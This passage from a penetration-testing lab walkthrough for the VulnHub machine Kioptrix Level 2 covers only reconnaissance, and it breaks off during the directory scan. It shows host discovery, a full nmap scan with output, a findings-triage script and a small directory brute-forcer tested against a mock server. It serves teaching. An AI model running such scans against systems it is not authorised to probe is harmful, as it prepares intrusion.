【Kioptrix_Level_2 Target Machine Vulnerability Reproduction】

Environment

Preparation

		One Kali attack machine
		One Kioptrix_Level_2 target machine

About the target

Download: https://www.vulnhub.com/entry/kioptrix-level-11-2,23/
Kioptrix_Level_2 contains the following vulnerabilities:
1. SQL injection
2. Remote command execution
3. Operating-system kernel vulnerability

Step 1: locate the target

Use netdiscover for host discovery on the local network.

About netdiscover: a dedicated layer-2 (ARP) discovery tool with both active and passive modes. Because it works at layer 2 it only sees hosts in the same broadcast domain, but it also finds hosts that drop ICMP.
Command:

netdiscover -i eth0 -r 192.168.251.0/24
-i: the interface to send and listen on, e.g. eth0.
-r: the range to scan, in CIDR notation, e.g. 192.168.251.0/24. Omit it to sweep the interface's own subnet; -p switches to passive mode (sniff only, send nothing).


Host discovery with nmap

nmap -sn 192.168.251.1-254
-sn: host discovery only, no port scan. On a directly attached Ethernet segment a root-run nmap does this with ARP requests, so it also finds hosts that filter ICMP.


Step 2: information gathering

Once a target host has been identified, the first task is information gathering: for example a port scan, to learn which ports are open and which services (and versions) sit behind them.

Port scan

In this example the target is 192.168.251.218 and the attacking host is 192.168.251.168.

Scan with nmap:

nmap -sC -sV -v -p- -A 192.168.251.218
-sC: run the default NSE script set
-sV: probe open ports for service and version information
-v: verbose output
-p-: scan all 65535 TCP ports (by default nmap only scans the 1000 most common)
-A: aggressive scan: OS detection, version detection, default scripts and traceroute (so -sC and -sV are already implied by -A)
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-10 07:08 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:08
Completed NSE at 07:08, 0.00s elapsed
Initiating NSE at 07:08
Completed NSE at 07:08, 0.00s elapsed
Initiating NSE at 07:08
Completed NSE at 07:08, 0.00s elapsed
Initiating ARP Ping Scan at 07:08
Scanning 192.168.251.218 [1 port]
Completed ARP Ping Scan at 07:08, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 07:08
Completed Parallel DNS resolution of 1 host. at 07:08, 0.01s elapsed
Initiating SYN Stealth Scan at 07:08
Scanning bogon (192.168.251.218) [65535 ports]
Discovered open port 3306/tcp on 192.168.251.218
Discovered open port 111/tcp on 192.168.251.218
Discovered open port 80/tcp on 192.168.251.218
Discovered open port 22/tcp on 192.168.251.218
Discovered open port 443/tcp on 192.168.251.218
Discovered open port 1019/tcp on 192.168.251.218
Discovered open port 631/tcp on 192.168.251.218
Completed SYN Stealth Scan at 07:08, 5.52s elapsed (65535 total ports)
Initiating Service scan at 07:08
Scanning 7 services on bogon (192.168.251.218)
Completed Service scan at 07:09, 12.09s elapsed (7 services on 1 host)
Initiating OS detection (try #1) against bogon (192.168.251.218)
NSE: Script scanning 192.168.251.218.
Initiating NSE at 07:09
Completed NSE at 07:09, 1.01s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 1.21s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Nmap scan report for bogon (192.168.251.218)
Host is up (0.00064s latency).
Not shown: 65528 closed tcp ports (reset)
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2            111/tcp   rpcbind
|   100000  2            111/udp   rpcbind
|   100024  1           1016/udp   status
|_  100024  1           1019/tcp   status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_ssl-date: 2024-09-10T07:59:31+00:00; -3h09m35s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_RC4_128_EXPORT40_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|_    SSL2_RC4_128_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
| Not valid after:  2010-10-08T00:10:47
| MD5:   01de:29f9:fbfb:2eb2:beaf:e624:3157:090f
|_SHA-1: 560c:9196:6506:fb0f:fb81:66b1:ded3:ac11:2ed4:808a
631/tcp  open  ipp      CUPS 1.1
|_http-title: 403 Forbidden
|_http-server-header: CUPS/1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
1019/tcp open  status   1 (RPC #100024)
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:40:84:E1 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Uptime guess: 0.015 days (since Tue Sep 10 06:47:05 2024)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=204 (Good luck!)
IP ID Sequence Generation: All zeros

Host script results:
|_clock-skew: -3h09m35s

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms bogon (192.168.251.218)

NSE: Script Post-scanning.
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Initiating NSE at 07:09
Completed NSE at 07:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.81 seconds
           Raw packets sent: 65561 (2.885MB) | Rcvd: 65551 (2.623MB)

The scan shows several commonly used ports open:

Port / service
22: SSH (OpenSSH 3.9p1; "protocol 1.99" and the sshv1 script show it still accepts SSHv1)
80: HTTP (Apache httpd 2.0.52 on CentOS)
111 and 1019: rpcbind and rpc.statd
443: HTTPS (the same Apache over SSL; SSLv2 is enabled and the self-signed, MD5-signed certificate expired in 2010)
631: CUPS 1.1 (printing; the PUT method is advertised)
3306: MySQL ("unauthorized" means the server rejected the scanner's source address before the handshake, so no version could be read; it is probably only meant to be reached from the box itself)

The OS fingerprint (Linux 2.6.9 to 2.6.30, consistent with the CentOS 4-era Apache 2.0.52) is worth noting now: it is what the kernel-vulnerability item in the target description refers to, and it will matter for privilege escalation later.
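Reading a full -A report by eye is error-prone, so the following script, an added example rather than code from the original post, parses the port table and the NSE script lines of an nmap normal-output report and applies the checks a pentester would make on this target: SSHv1, SSLv2, an expired or self-signed certificate, an MD5 signature, risky HTTP methods, and a MySQL server that refuses the scanner's host. The sample report embedded in it is a trimmed copy of the scan above; the function names, the finding wording and the date comparison are assumptions of this example.

```python
# Added example, not from the original walkthrough: triage an nmap -sV/-sC report.
import re
from datetime import datetime

# Constructed sample input: a trimmed copy of the scan shown above.
SAMPLE_REPORT = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2: 
|   SSLv2 supported
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization
| Issuer: commonName=localhost.localdomain/organizationName=SomeOrganization
| Signature Algorithm: md5WithRSAEncryption
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
631/tcp  open  ipp      CUPS 1.1
| http-methods: 
|   Supported Methods: GET HEAD OPTIONS POST PUT
|_  Potentially risky methods: PUT
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:40:84:E1 (VMware)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(report):
    """Return {port: {"proto", "state", "service", "version", "script": [...]}}."""
    ports, current = {}, None
    for line in report.splitlines():
        m = PORT_RE.match(line)
        if m:
            current = int(m.group(1))
            ports[current] = {"proto": m.group(2), "state": m.group(3),
                              "service": m.group(4), "version": m.group(5).strip(),
                              "script": []}
        elif line.startswith("|") and current is not None:
            # NSE lines carry a "| " or "|_" gutter plus indentation; strip both.
            ports[current]["script"].append(line[1:].lstrip("_ ").rstrip())
        else:
            current = None  # MAC address, OS guess etc. end the port table
    return ports


def triage(ports, scan_date):
    """Return human-readable findings; scan_date is an ISO date such as '2024-09-10'."""
    today = datetime.fromisoformat(scan_date)
    findings = []
    for port, info in sorted(ports.items()):
        script = "\n".join(info["script"])
        tag = f"{port}/{info['proto']} {info['service']}"
        if "Server supports SSHv1" in script:
            findings.append(f"{tag}: SSHv1 accepted (protocol 1.99 can negotiate down)")
        if "SSLv2 supported" in script:
            findings.append(f"{tag}: SSLv2 enabled")
        subject = re.search(r"^ssl-cert: Subject: (.*)$", script, re.M)
        issuer = re.search(r"^Issuer: (.*)$", script, re.M)
        if subject and issuer and subject.group(1) == issuer.group(1):
            findings.append(f"{tag}: self-signed certificate")
        not_after = re.search(r"^Not valid after:\s*(\S+)$", script, re.M)
        if not_after and datetime.fromisoformat(not_after.group(1)) < today:
            findings.append(f"{tag}: certificate expired {not_after.group(1)}")
        if "md5WithRSAEncryption" in script:
            findings.append(f"{tag}: certificate signed with MD5")
        risky = re.search(r"^Potentially risky methods: (.*)$", script, re.M)
        if risky:
            findings.append(f"{tag}: risky HTTP methods {risky.group(1)}")
        if info["service"] == "mysql" and "unauthorized" in info["version"]:
            findings.append(f"{tag}: server refused this source host; version unknown")
    return findings


if __name__ == "__main__":
    for finding in triage(parse_nmap(SAMPLE_REPORT), "2024-09-10"):
        print(finding)
```

To use it on a live scan, save nmap's normal output (`-oN scan.txt`) and pass the file's contents to `parse_nmap`; the parser stops at the first line that is neither a port entry nor an NSE continuation, which is how it ignores the OS and traceroute sections.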

Open http://192.168.251.218/ in a browser to look at port 80.
There is a login form. Before touching it, enumerate directories.

Directory scan

1. dirb directory scan

dirb http://192.168.251.218/

With no wordlist argument dirb uses /usr/share/dirb/wordlists/common.txt and recurses into every directory it finds (except listable ones, which it reports and skips), which is why most of the output below is the stock Apache /manual/ tree rather than anything specific to this application.
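To make the logic behind that output concrete, here is a minimal dirb-style brute-forcer, added as an example and not code from the original post or from dirb. It requests each word from a wordlist, treats a 301 to the same path with a trailing slash as a directory (Apache's behaviour), recurses into directories that answer 200, and reports a directory serving an "Index of" page as listable without descending into it. It runs against a constructed in-process mock site shaped like the tree dirb found on this target; the mock tree, the wordlist and the function names are assumptions of this example, and against a real target you would call scan() with the target's base URL instead.

```python
# Added example, not the original post's code nor dirb's: a small recursive
# directory brute-forcer exercised against an in-process mock web server.
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlsplit

# Constructed mock tree: path -> (status, body). Directories end with "/".
MOCK_SITE = {
    "/index.php": (200, "<form>login</form>"),
    "/cgi-bin/": (403, "Forbidden"),
    "/usage": (403, "Forbidden"),
    "/manual/": (200, "<html>Apache HTTP Server documentation</html>"),
    "/manual/index.html": (200, "<html>manual index</html>"),
    "/manual/images/": (200, "<title>Index of /manual/images</title>"),
}
# Tiny stand-in for /usr/share/dirb/wordlists/common.txt.
WORDLIST = ["admin", "cgi-bin", "images", "index.php", "index.html",
            "manual", "usage", "login"]


class MockHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if self.path in MOCK_SITE:
            status, body = MOCK_SITE[self.path]
        elif self.path + "/" in MOCK_SITE:
            # Apache answers /dir with a 301 to /dir/, as seen in the dirb output.
            self.send_response(301)
            self.send_header("Location", self.path + "/")
            self.end_headers()
            return
        else:
            status, body = 404, "Not Found"
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):
        pass  # silence per-request logging


def start_mock_server():
    """Serve MOCK_SITE on an ephemeral loopback port; returns (server, base_url)."""
    server = HTTPServer(("127.0.0.1", 0), MockHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def probe(base, path):
    """GET one path without following redirects; returns (status, body)."""
    u = urlsplit(base)
    conn = http.client.HTTPConnection(u.hostname, u.port, timeout=5)
    conn.request("GET", path, headers={"User-Agent": "dirb-clone"})
    resp = conn.getresponse()
    body = resp.read().decode(errors="replace")
    conn.close()
    return resp.status, body


def scan(base, wordlist, directory="/", depth=3):
    """Request every word under `directory`; recurse into directories like dirb.

    Returns [(path, status)] for every non-404 hit. A 301 to path + "/" marks a
    directory; one that serves an "Index of" page is reported as LISTABLE and
    not recursed into (dirb does the same and offers -w to override).
    """
    found = []
    for word in wordlist:
        path = directory + word
        status, body = probe(base, path)
        if status == 404:
            continue
        if status == 301:
            dir_path = path + "/"
            dstatus, dbody = probe(base, dir_path)
            if "Index of" in dbody:
                found.append((dir_path, "LISTABLE"))
            else:
                found.append((dir_path, dstatus))
                if dstatus == 200 and depth > 1:
                    found.extend(scan(base, wordlist, dir_path, depth - 1))
            continue
        found.append((path, status))
    return found


if __name__ == "__main__":
    server, base = start_mock_server()
    try:
        for path, status in scan(base, WORDLIST):
            print(f"{status:>8}  {path}")
    finally:
        server.shutdown()
        server.server_close()
```

The two things worth copying from dirb are visible here: redirects are not followed (a 301 is itself the evidence that a directory exists), and a 403 is still a hit, since cgi-bin/ and usage above exist even though Apache refuses to serve them.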

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Sep 10 07:29:08 2024
URL_BASE: http://192.168.251.218/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.251.218/ ----
+ http://192.168.251.218/cgi-bin/ (CODE:403|SIZE:291)                                                   
+ http://192.168.251.218/index.php (CODE:200|SIZE:667)                                                  
==> DIRECTORY: http://192.168.251.218/manual/                                                           
+ http://192.168.251.218/usage (CODE:403|SIZE:288)                                                      
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ ----
==> DIRECTORY: http://192.168.251.218/manual/de/                                                        
==> DIRECTORY: http://192.168.251.218/manual/developer/                                                 
==> DIRECTORY: http://192.168.251.218/manual/en/                                                        
==> DIRECTORY: http://192.168.251.218/manual/faq/                                                       
==> DIRECTORY: http://192.168.251.218/manual/fr/                                                        
==> DIRECTORY: http://192.168.251.218/manual/howto/                                                     
==> DIRECTORY: http://192.168.251.218/manual/images/                                                    
+ http://192.168.251.218/manual/index.html (CODE:200|SIZE:7234)                                         
==> DIRECTORY: http://192.168.251.218/manual/ja/                                                        
==> DIRECTORY: http://192.168.251.218/manual/ko/                                                        
+ http://192.168.251.218/manual/LICENSE (CODE:200|SIZE:11358)                                           
==> DIRECTORY: http://192.168.251.218/manual/misc/                                                      
==> DIRECTORY: http://192.168.251.218/manual/mod/                                                       
==> DIRECTORY: http://192.168.251.218/manual/programs/                                                  
==> DIRECTORY: http://192.168.251.218/manual/ru/                                                        
==> DIRECTORY: http://192.168.251.218/manual/ssl/                                                       
==> DIRECTORY: http://192.168.251.218/manual/style/                                                     
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/ ----
+ http://192.168.251.218/manual/de/de (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/de/developer/                                              
+ http://192.168.251.218/manual/de/en (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/de/faq/                                                    
+ http://192.168.251.218/manual/de/fr (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/de/howto/                                                  
==> DIRECTORY: http://192.168.251.218/manual/de/images/                                                 
+ http://192.168.251.218/manual/de/index.html (CODE:200|SIZE:7317)                                      
+ http://192.168.251.218/manual/de/ja (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/de/ko (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/de/LICENSE (CODE:200|SIZE:11358)                                        
==> DIRECTORY: http://192.168.251.218/manual/de/misc/                                                   
==> DIRECTORY: http://192.168.251.218/manual/de/mod/                                                    
==> DIRECTORY: http://192.168.251.218/manual/de/programs/                                               
+ http://192.168.251.218/manual/de/ru (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/de/ssl/                                                    
==> DIRECTORY: http://192.168.251.218/manual/de/style/                                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/developer/ ----
+ http://192.168.251.218/manual/developer/index.html (CODE:200|SIZE:4770)                               
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/ ----
+ http://192.168.251.218/manual/en/de (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/en/developer/                                              
+ http://192.168.251.218/manual/en/en (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/en/faq/                                                    
+ http://192.168.251.218/manual/en/fr (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/en/howto/                                                  
==> DIRECTORY: http://192.168.251.218/manual/en/images/                                                 
+ http://192.168.251.218/manual/en/index.html (CODE:200|SIZE:7234)                                      
+ http://192.168.251.218/manual/en/ja (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/en/ko (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/en/LICENSE (CODE:200|SIZE:11358)                                        
==> DIRECTORY: http://192.168.251.218/manual/en/misc/                                                   
==> DIRECTORY: http://192.168.251.218/manual/en/mod/                                                    
==> DIRECTORY: http://192.168.251.218/manual/en/programs/                                               
+ http://192.168.251.218/manual/en/ru (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/en/ssl/                                                    
==> DIRECTORY: http://192.168.251.218/manual/en/style/                                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/faq/ ----
+ http://192.168.251.218/manual/faq/index.html (CODE:200|SIZE:3564)                                     
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/ ----
+ http://192.168.251.218/manual/fr/de (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/fr/developer/                                              
+ http://192.168.251.218/manual/fr/en (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/fr/faq/                                                    
+ http://192.168.251.218/manual/fr/fr (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/fr/howto/                                                  
==> DIRECTORY: http://192.168.251.218/manual/fr/images/                                                 
+ http://192.168.251.218/manual/fr/index.html (CODE:200|SIZE:7234)                                      
+ http://192.168.251.218/manual/fr/ja (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/fr/ko (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/fr/LICENSE (CODE:200|SIZE:11358)                                        
==> DIRECTORY: http://192.168.251.218/manual/fr/misc/                                                   
==> DIRECTORY: http://192.168.251.218/manual/fr/mod/                                                    
==> DIRECTORY: http://192.168.251.218/manual/fr/programs/                                               
+ http://192.168.251.218/manual/fr/ru (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/fr/ssl/                                                    
==> DIRECTORY: http://192.168.251.218/manual/fr/style/                                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/howto/ ----
+ http://192.168.251.218/manual/howto/index.html (CODE:200|SIZE:5685)                                   
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/ ----
+ http://192.168.251.218/manual/ja/de (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ja/developer/                                              
+ http://192.168.251.218/manual/ja/en (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ja/faq/                                                    
+ http://192.168.251.218/manual/ja/fr (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ja/howto/                                                  
==> DIRECTORY: http://192.168.251.218/manual/ja/images/                                                 
+ http://192.168.251.218/manual/ja/index.html (CODE:200|SIZE:7227)                                      
+ http://192.168.251.218/manual/ja/ja (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/ja/ko (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/ja/LICENSE (CODE:200|SIZE:11358)                                        
==> DIRECTORY: http://192.168.251.218/manual/ja/misc/                                                   
==> DIRECTORY: http://192.168.251.218/manual/ja/mod/                                                    
==> DIRECTORY: http://192.168.251.218/manual/ja/programs/                                               
+ http://192.168.251.218/manual/ja/ru (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ja/ssl/                                                    
==> DIRECTORY: http://192.168.251.218/manual/ja/style/                                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ko/ ----
+ http://192.168.251.218/manual/ko/de (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ko/developer/                                              
+ http://192.168.251.218/manual/ko/en (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ko/faq/                                                    
+ http://192.168.251.218/manual/ko/fr (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ko/howto/                                                  
==> DIRECTORY: http://192.168.251.218/manual/ko/images/                                                 
+ http://192.168.251.218/manual/ko/index.html (CODE:200|SIZE:6954)                                      
+ http://192.168.251.218/manual/ko/ja (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/ko/ko (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/ko/LICENSE (CODE:200|SIZE:11358)                                        
==> DIRECTORY: http://192.168.251.218/manual/ko/misc/                                                   
==> DIRECTORY: http://192.168.251.218/manual/ko/mod/                                                    
==> DIRECTORY: http://192.168.251.218/manual/ko/programs/                                               
+ http://192.168.251.218/manual/ko/ru (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ko/ssl/                                                    
==> DIRECTORY: http://192.168.251.218/manual/ko/style/                                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/misc/ ----
+ http://192.168.251.218/manual/misc/index.html (CODE:200|SIZE:5491)                                    
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/mod/ ----
+ http://192.168.251.218/manual/mod/index.html (CODE:200|SIZE:13437)                                    
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/programs/ ----
+ http://192.168.251.218/manual/programs/index.html (CODE:200|SIZE:4664)                                
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ru/ ----
+ http://192.168.251.218/manual/ru/de (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ru/developer/                                              
+ http://192.168.251.218/manual/ru/en (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ru/faq/                                                    
+ http://192.168.251.218/manual/ru/fr (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ru/howto/                                                  
==> DIRECTORY: http://192.168.251.218/manual/ru/images/                                                 
+ http://192.168.251.218/manual/ru/index.html (CODE:200|SIZE:7277)                                      
+ http://192.168.251.218/manual/ru/ja (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/ru/ko (CODE:301|SIZE:321)                                               
+ http://192.168.251.218/manual/ru/LICENSE (CODE:200|SIZE:11358)                                        
==> DIRECTORY: http://192.168.251.218/manual/ru/misc/                                                   
==> DIRECTORY: http://192.168.251.218/manual/ru/mod/                                                    
==> DIRECTORY: http://192.168.251.218/manual/ru/programs/                                               
+ http://192.168.251.218/manual/ru/ru (CODE:301|SIZE:321)                                               
==> DIRECTORY: http://192.168.251.218/manual/ru/ssl/                                                    
==> DIRECTORY: http://192.168.251.218/manual/ru/style/                                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ssl/ ----
+ http://192.168.251.218/manual/ssl/index.html (CODE:200|SIZE:3988)                                     
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/developer/ ----
+ http://192.168.251.218/manual/de/developer/index.html (CODE:200|SIZE:4770)                            
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/faq/ ----
+ http://192.168.251.218/manual/de/faq/index.html (CODE:200|SIZE:3564)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/howto/ ----
+ http://192.168.251.218/manual/de/howto/index.html (CODE:200|SIZE:5685)                                
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/misc/ ----
+ http://192.168.251.218/manual/de/misc/index.html (CODE:200|SIZE:5491)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/mod/ ----
+ http://192.168.251.218/manual/de/mod/index.html (CODE:200|SIZE:13561)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/programs/ ----
+ http://192.168.251.218/manual/de/programs/index.html (CODE:200|SIZE:4664)                             
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/ssl/ ----
+ http://192.168.251.218/manual/de/ssl/index.html (CODE:200|SIZE:3988)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/de/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/developer/ ----
+ http://192.168.251.218/manual/en/developer/index.html (CODE:200|SIZE:4770)                            
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/faq/ ----
+ http://192.168.251.218/manual/en/faq/index.html (CODE:200|SIZE:3564)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/howto/ ----
+ http://192.168.251.218/manual/en/howto/index.html (CODE:200|SIZE:5685)                                
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/misc/ ----
+ http://192.168.251.218/manual/en/misc/index.html (CODE:200|SIZE:5491)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/mod/ ----
+ http://192.168.251.218/manual/en/mod/index.html (CODE:200|SIZE:13437)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/programs/ ----
+ http://192.168.251.218/manual/en/programs/index.html (CODE:200|SIZE:4664)                             
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/ssl/ ----
+ http://192.168.251.218/manual/en/ssl/index.html (CODE:200|SIZE:3988)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/en/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/developer/ ----
+ http://192.168.251.218/manual/fr/developer/index.html (CODE:200|SIZE:4770)                            
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/faq/ ----
+ http://192.168.251.218/manual/fr/faq/index.html (CODE:200|SIZE:3564)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/howto/ ----
+ http://192.168.251.218/manual/fr/howto/index.html (CODE:200|SIZE:5685)                                
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/misc/ ----
+ http://192.168.251.218/manual/fr/misc/index.html (CODE:200|SIZE:5491)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/mod/ ----
+ http://192.168.251.218/manual/fr/mod/index.html (CODE:200|SIZE:13437)                                 
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/programs/ ----
+ http://192.168.251.218/manual/fr/programs/index.html (CODE:200|SIZE:4664)                             
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/ssl/ ----
+ http://192.168.251.218/manual/fr/ssl/index.html (CODE:200|SIZE:3988)                                  
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/fr/style/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                        
---- Entering directory: http://192.168.251.218/manual/ja/developer/ ----
